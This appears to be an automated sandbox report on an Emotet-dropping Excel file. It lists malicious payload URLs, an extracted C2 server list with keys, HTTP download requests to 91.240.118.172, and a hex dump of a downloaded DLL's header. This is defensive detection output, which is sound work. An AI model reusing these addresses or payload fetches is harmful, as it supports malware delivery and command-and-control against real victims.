                            Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3Avira URL Cloud: Label: malware
                            Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/Avira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlAvira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 13.2.rundll32.exe.2430000.5.unpackMalware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                            Multi AV Scanner detection for submitted file
                            Source: imedpub_6.xlsReversingLabs: Detection: 18%
                            Multi AV Scanner detection for domain / URL
                            Source: hostfeeling.comVirustotal: Detection: 10%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\JooSee.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.673260423.0000000002D57000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
                            Source: global trafficDNS query: name: hostfeeling.com
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 160.16.102.168 80
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: Malware configuration extractorIPs: 131.100.24.231:80
                            Source: Malware configuration extractorIPs: 200.17.134.35:7080
                            Source: Malware configuration extractorIPs: 207.38.84.195:8080
                            Source: Malware configuration extractorIPs: 212.237.56.116:7080
                            Source: Malware configuration extractorIPs: 58.227.42.236:80
                            Source: Malware configuration extractorIPs: 104.251.214.46:8080
                            Source: Malware configuration extractorIPs: 158.69.222.101:443
                            Source: Malware configuration extractorIPs: 192.254.71.210:443
                            Source: Malware configuration extractorIPs: 46.55.222.11:443
                            Source: Malware configuration extractorIPs: 45.118.135.203:7080
                            Source: Malware configuration extractorIPs: 107.182.225.142:8080
                            Source: Malware configuration extractorIPs: 103.75.201.2:443
                            Source: Malware configuration extractorIPs: 104.168.155.129:8080
                            Source: Malware configuration extractorIPs: 195.154.133.20:443
                            Source: Malware configuration extractorIPs: 159.8.59.82:8080
                            Source: Malware configuration extractorIPs: 110.232.117.186:8080
                            Source: Malware configuration extractorIPs: 45.142.114.231:8080
                            Source: Malware configuration extractorIPs: 41.76.108.46:8080
                            Source: Malware configuration extractorIPs: 203.114.109.124:443
                            Source: Malware configuration extractorIPs: 50.116.54.215:443
                            Source: Malware configuration extractorIPs: 209.59.138.75:7080
                            Source: Malware configuration extractorIPs: 185.157.82.211:8080
                            Source: Malware configuration extractorIPs: 164.68.99.3:8080
                            Source: Malware configuration extractorIPs: 162.214.50.39:7080
                            Source: Malware configuration extractorIPs: 138.185.72.26:8080
                            Source: Malware configuration extractorIPs: 178.63.25.185:443
                            Source: Malware configuration extractorIPs: 51.15.4.22:443
                            Source: Malware configuration extractorIPs: 81.0.236.90:443
                            Source: Malware configuration extractorIPs: 216.158.226.206:443
                            Source: Malware configuration extractorIPs: 45.176.232.124:443
                            Source: Malware configuration extractorIPs: 162.243.175.63:443
                            Source: Malware configuration extractorIPs: 212.237.17.99:8080
                            Source: Malware configuration extractorIPs: 45.118.115.99:8080
                            Source: Malware configuration extractorIPs: 129.232.188.93:443
                            Source: Malware configuration extractorIPs: 173.214.173.220:8080
                            Source: Malware configuration extractorIPs: 178.79.147.66:8080
                            Source: Malware configuration extractorIPs: 176.104.106.96:8080
                            Source: Malware configuration extractorIPs: 51.38.71.0:443
                            Source: Malware configuration extractorIPs: 173.212.193.249:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 212.24.98.99:8080
                            Source: Malware configuration extractorIPs: 159.89.230.105:443
                            Source: Malware configuration extractorIPs: 79.172.212.216:8080
                            Source: Malware configuration extractorIPs: 212.237.5.209:443
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:02:00 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f44bb842acf=1643400120; expires=Fri, 28-Jan-2022 20:03:00 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:02:00 GMTExpires: Fri, 28 Jan 2022 20:02:00 GMTContent-Disposition: attachment; filename="uHkwl.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                            Source: unknownNetwork traffic detected: IP country count 21
                            Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172
                            Source: mshta.exe, 00000004.00000003.433680671.00000000003BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html
                            Source: mshta.exe, 00000004.00000003.419116889.0000000000380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html:
                            Source: imedpub_6.xls.0.drString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
                            Source: mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlC
                            Source: mshta.exe, 00000004.00000002.434771274.0000000000300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
                            Source: mshta.exe, 00000004.00000003.420573882.0000000002ACD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
                            Source: mshta.exe, 00000004.00000003.420332765.0000000002AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
                            Source: mshta.exe, 00000004.00000002.434771274.0000000000300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
                            Source: mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
                            Source: mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html~
                            Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.p
                            Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.678389430.000000001B494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.png
                            Source: powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/libraries/8s/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-adm
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                            Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en-
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.15.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ed17b873e6546
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.suk
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-cont
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
                            Source: powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ja.com/
                            Source: powershell.exe, 00000006.00000002.677598508.00000000038AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/asset
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/f
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
                            Source: mshta.exe, 00000004.00000003.419178772.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.434882434.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.435386261.0000000003CAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.433698819.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.435368888.0000000003C92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.433744661.0000000003C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419492395.0000000003CAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168/
                            Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168/3
                            Source: rundll32.exe, 0000000F.00000002.673084051.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.102.168:80/SoFzpWBFIEFVoCFQgg
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/9
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/97v/
                            Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
                            Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: hostfeeling.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
